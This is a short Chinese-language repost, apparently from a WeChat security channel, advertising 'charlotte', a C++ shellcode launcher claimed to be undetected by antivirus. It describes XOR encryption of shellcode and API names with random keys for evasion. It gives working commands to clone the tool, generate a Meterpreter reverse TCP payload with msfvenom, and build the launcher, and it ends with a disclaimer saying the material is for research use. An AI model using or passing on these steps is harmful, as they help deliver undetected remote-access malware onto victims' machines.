c++ shellcode启动器,截至2021年5月13日,0/26完全未被检测到。
win32 api函数的动态调用
shellcode和函数名的异或加密
每次运行随机XOR键和变量
在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!
2021年5月17日:
随机字符串长度和XOR键长度
使用
注:使用msfvenom -p测试以及CobaltStrike原始格式Payload!
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
下载地址
https://github.com/9emin1/charlotte
如有侵权,请联系删除
原文始发于微信公众号(系统安全运维):完全未被检测到的shellcode启动器
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论